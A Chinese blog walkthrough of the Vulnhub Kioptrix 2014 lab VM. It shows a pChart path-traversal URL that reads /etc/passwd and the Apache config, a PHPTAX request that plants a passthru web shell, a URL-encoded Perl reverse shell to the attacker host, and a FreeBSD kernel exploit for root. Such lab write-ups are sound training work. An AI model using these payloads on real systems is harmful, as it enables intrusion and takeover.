Vulnhub靶机:Kioptrix_2014

  • 开发
  • 41

一、介绍

运行环境:Virtualbox和vmware

攻击机:kali(192.168.56.101)

靶机:Kioptrix: 2014(192.168.56.108)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/kioptrix-2014-5,62/

二、信息收集

靶机下载下来之后,直接运行使用nmap扫描检测不到IP地址

需要删除靶机原来的网卡,再重新添加网卡上去。

在这里插入图片描述

使用nmap主机发现靶机ip:192.168.56.108

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80、8080

nmap -A 192.168.56.108 -p 1-65535

在这里插入图片描述

打开网站该网站是一个静态页面,查看源码发现隐藏信息:URL=pChart2.1.3/index.php

在这里插入图片描述

访问pChart2.1.3/index.php,该页面CMS为pChart2.1.3

在这里插入图片描述

使用searchsploit搜索pChart2.1.3的历史漏洞,并将找到的结果导出、查看

在这里插入图片描述

发现一个任意文件读取漏洞

/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

在这里插入图片描述

浏览器访问,验证该漏洞

在这里插入图片描述

三、漏洞利用

在 FreeBSD 中,Apache HTTP 服务器的主配置文件安装为 /usr/local/etc/apache2x/httpd.conf,其中 x 表示版本号。

参考:https://fiercex.github.io/FreeBSD_Handbook_d2l/di-32-zhang-wang-luo-fu-wu-qi/32.8.-apache-http-fu-wu-qi.html

根据nmap扫描结果apache的版本为2.2.21,所以访问:http://192.168.56.108/pChart2.1.3/examples/index.php?Action=View&Script=/usr/local/etc/apache22/httpd.conf,查看靶机apache的配置文件,在文件发现配置,访问8080端口需要User-AgentMozilla/4.0

在这里插入图片描述

访问8080端口,禁止访问

在这里插入图片描述

我们User-Agent设置为Mozilla/4.0,发现一个目录phptax/

在这里插入图片描述

访问该目录,可以看到该网站CMS为PHPTAX

在这里插入图片描述

使用searchsploit搜索PHPTAX的历史漏洞,发现命令执行漏洞

在这里插入图片描述

将这几个exp导出,都尝试一下,查看25849.txt,里面有一个php的exp,加入设置User-Agent的代码,尝试执行发现报错。

直接查看php的exp源码,该exp访问两个url,来命令执行

访问http://192.168.56.108:8080/phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E将命令执行代码写入rce.php

在这里插入图片描述

访问http://192.168.56.108:8080/phptax/data/rce.php?cmd=id执行id命令

在这里插入图片描述

使用perl反弹shell成功:http://192.168.56.108:8080/phptax/data/rce.php?cmd=perl%20-e%20'use%20Socket%3B%24i%3D%22192.168.56.101%22%3B%24p%3D4444%3Bsocket(S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname(%22tcp%22))%3Bif(connect(S%2Csockaddr_in(%24p%2Cinet_aton(%24i))))%7Bopen(STDIN%2C%22%3E%26S%22)%3Bopen(STDOUT%2C%22%3E%26S%22)%3Bopen(STDERR%2C%22%3E%26S%22)%3Bexec(%22%2Fbin%2Fsh%20-i%22)%3B%7D%3B'

在这里插入图片描述

四、提权

使用命令uname -a查看系统的内核版本,为FreeBSD 9.0-RELEASE

在这里插入图片描述

使用searchsploit搜索该版本的历史漏洞

searchsploit FreeBSD 9.0

在这里插入图片描述

选用26368.c,使用web服务上传exp到靶机,但发现靶机没有wget命令

使用echo '''exp code''' > exp.c命令将exp代码写入靶机

在这里插入图片描述
在这里插入图片描述

将exp.c编译执行,得到root权限

在这里插入图片描述

参考链接:https://www.freebuf.com/column/211565.html

阅读全部

相关推荐

  10. vulnhub靶机Phineas

    2024-03-21 04:14:03       64 阅读

最近更新

  3. docker php8.1+nginx base 镜像 dockerfile 配置

    2024-03-21 04:14:03       94 阅读

  4. Could not load dynamic library ‘cudart64_100.dll‘

    2024-03-21 04:14:03       101 阅读

  9. 在Django里面运行非项目文件

    2024-03-21 04:14:03       82 阅读

  19. Python语言-面向对象

    2024-03-21 04:14:03       91 阅读

  20. 如何分清楚常见的 Git 分支管理策略Git Flow、GitHub Flow 和 GitLab Flow

    2024-03-21 04:14:03       85 阅读

热门阅读

  1. 27-5 文件上传漏洞 -大小写、空格、点、下划线等绕过

    2024-03-21 04:14:03       47 阅读

  2. 华为OD机试 C++ -围棋的气

    2024-03-21 04:14:03       36 阅读

  4. WPF 中 样式触发器机制 Style.Triggers

    2024-03-21 04:14:03       43 阅读

  10. 【C语言学习日志】Hello World!

    2024-03-21 04:14:03       40 阅读

  11. MyBatis面试系列-02

    2024-03-21 04:14:03       40 阅读

  18. 量化交易入门(三)量化交易学习使用Python的优势

    2024-03-21 04:14:03       47 阅读

  23. 【无标题】

    2024-03-21 04:14:03       40 阅读

  26. QT 异常处理

    2024-03-21 04:14:03       39 阅读